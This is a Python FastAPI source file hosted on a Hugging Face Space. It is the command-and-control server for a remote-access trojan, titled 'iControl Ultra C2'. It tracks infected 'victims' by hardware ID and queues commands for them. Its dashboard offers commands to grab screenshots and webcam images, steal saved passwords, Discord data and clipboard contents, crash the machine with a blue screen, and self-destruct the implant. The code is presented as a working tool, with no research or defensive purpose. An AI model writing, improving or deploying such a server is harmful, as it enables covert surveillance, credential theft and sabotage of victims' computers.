Spaces:

SitesMySite
/

Mouse

Sleeping

App Files Files Community

Mouse / main.py

nicolaydef

Update main.py

90bfafc verified about 2 months ago

raw

history blame contribute delete

6.66 kB

	import os, datetime, json, base64
	from fastapi import FastAPI, Request, Form, UploadFile, File
	from fastapi.responses import HTMLResponse, JSONResponse
	from jinja2 import Template

	app = FastAPI()
	victims = {} # Хранилище в памяти. Для сохранения при перезагрузке используй SQLite.

	DASHBOARD_HTML = """
	<!DOCTYPE html>
	<html lang="ru">
	<head>
	<meta charset="UTF-8">
	<title>iControl Ultra C2</title>
	<style>
	:root { --bg: #000; --card: #1c1c1e; --accent: #0a84ff; --danger: #ff453a; --success: #32d74b; }
	body { background: var(--bg); color: white; font-family: -apple-system, sans-serif; margin: 0; padding: 20px; overflow-x: hidden; }
	.nav { display: flex; justify-content: space-between; align-items: center; border-bottom: 1px solid #333; padding-bottom: 10px; margin-bottom: 20px; }
	.grid { display: grid; grid-template-columns: repeat(auto-fill, minmax(350px, 1fr)); gap: 20px; }
	.card { background: var(--card); border-radius: 20px; padding: 20px; border: 1px solid #333; }
	.tabs { display: flex; gap: 10px; margin-top: 15px; flex-wrap: wrap; }
	.tab-btn { background: #2c2c2e; color: #fff; border: none; padding: 5px 10px; border-radius: 8px; font-size: 11px; cursor: pointer; }
	.tab-btn:hover { background: var(--accent); }
	.console { background: #000; color: var(--success); padding: 10px; border-radius: 10px; font-family: monospace; font-size: 12px; margin-top: 10px; max-height: 150px; overflow-y: auto; }
	#modal { display:none; position:fixed; top:50%; left:50%; transform:translate(-50%, -50%); width:80%; max-width:700px;
	background: rgba(28,28,30,0.95); backdrop-filter: blur(20px); border-radius: 25px; padding: 25px; z-index: 1000; border: 1px solid #444; }
	#overlay { display:none; position:fixed; top:0; left:0; width:100%; height:100%; background:rgba(0,0,0,0.8); z-index: 999; }
	img.res { width: 100%; border-radius: 12px; margin-top: 10px; border: 1px solid #444; }
	</style>
	</head>
	<body>
	<div class="nav">
	<h2>iControl <span style="color:var(--accent)">v3.0 Premium</span></h2>
	<div id="stats">Active: {{ victims\|length }}</div>
	</div>
	<div class="grid">
	{% for hwid, data in victims.items() %}
	<div class="card">
	<div style="font-weight:bold; font-size:18px;">{{ data.info.username }} @ {{ hwid }}</div>
	<div style="color:var(--accent); font-size:12px;">{{ data.info.os }} \| {{ data.ip }}</div>

	<div class="tabs">
	<button class="tab-btn" onclick="send('{{ hwid }}', 'screen')">🖥 Screen</button>
	<button class="tab-btn" onclick="send('{{ hwid }}', 'cam')">📷 Cam</button>
	<button class="tab-btn" onclick="send('{{ hwid }}', 'info_full')">ℹ️ Info</button>
	<button class="tab-btn" onclick="send('{{ hwid }}', 'passwords')">🔑 Pass</button>
	<button class="tab-btn" onclick="send('{{ hwid }}', 'discord')">💬 Disc</button>
	<button class="tab-btn" onclick="send('{{ hwid }}', 'clip')">📋 Clip</button>
	<button class="tab-btn" onclick="send('{{ hwid }}', 'crazy_mouse')">🖱 Fun</button>
	<button class="tab-btn" onclick="send('{{ hwid }}', 'bsod')">💀 BSOD</button>
	<button class="tab-btn" style="color:var(--danger)" onclick="send('{{ hwid }}', 'die')">Self-Destruct</button>
	</div>
	<div class="console" id="log_{{ hwid }}">{{ data.last_result[:200] }}</div>
	</div>
	{% endfor %}
	</div>

	<div id="overlay" onclick="closeM()"></div>
	<div id="modal">
	<h3 id="m_title">Result</h3>
	<div id="m_body"></div>
	<button onclick="closeM()" style="width:100%; margin-top:20px; background:var(--accent); color:white; border:none; padding:10px; border-radius:10px;">Close</button>
	</div>

	<script>
	async function send(hwid, cmd) {
	await fetch('/cmd', {
	method: 'POST',
	headers: {'Content-Type': 'application/x-www-form-urlencoded'},
	body: `hwid=${hwid}&command=${cmd}`
	});
	openM("Command Sent", "Waiting for host...");
	poll(hwid);
	}
	function poll(hwid) {
	const i = setInterval(async () => {
	const r = await fetch(`/api/res/${hwid}`);
	const d = await r.json();
	if(d.result !== "idle") {
	if(d.result.startsWith("[IMG]")) {
	document.getElementById('m_body').innerHTML = `<img src="data:image/jpeg;base64,${d.result.substring(5)}" class="res">`;
	} else {
	document.getElementById('m_body').innerHTML = `<pre style="color:var(--success); white-space:pre-wrap;">${d.result}</pre>`;
	}
	clearInterval(i);
	}
	}, 2000);
	}
	function openM(t, b) {
	document.getElementById('m_title').innerText = t;
	document.getElementById('m_body').innerHTML = b;
	document.getElementById('modal').style.display='block';
	document.getElementById('overlay').style.display='block';
	}
	function closeM() { document.getElementById('modal').style.display='none'; document.getElementById('overlay').style.display='none'; }
	</script>
	</body>
	</html>
	"""

	@app.get("/", response_class=HTMLResponse)
	async def index():
	return Template(DASHBOARD_HTML).render(victims=victims)

	@app.post("/api/reg")
	async def reg(data: dict, request: Request):
	hwid = data['hwid']
	victims[hwid] = {"ip": request.client.host, "info": data, "queue": [], "last_result": "idle"}
	return {"status": "ok"}

	@app.get("/api/task/{hwid}")
	async def task(hwid: str):
	if hwid in victims and victims[hwid]["queue"]:
	return {"cmd": victims[hwid]["queue"].pop(0)}
	return {"cmd": "idle"}

	@app.post("/api/report")
	async def report(data: dict):
	if data['hwid'] in victims:
	victims[data['hwid']]["last_result"] = data['result']
	return {"status": "ok"}

	@app.get("/api/res/{hwid}")
	async def get_res(hwid: str):
	return {"result": victims.get(hwid, {}).get("last_result", "idle")}

	@app.post("/cmd")
	async def add_cmd(hwid: str = Form(...), command: str = Form(...)):
	if hwid in victims:
	victims[hwid]["queue"].append(command)
	victims[hwid]["last_result"] = "idle"
	return {"ok": True}
	return {"ok": False}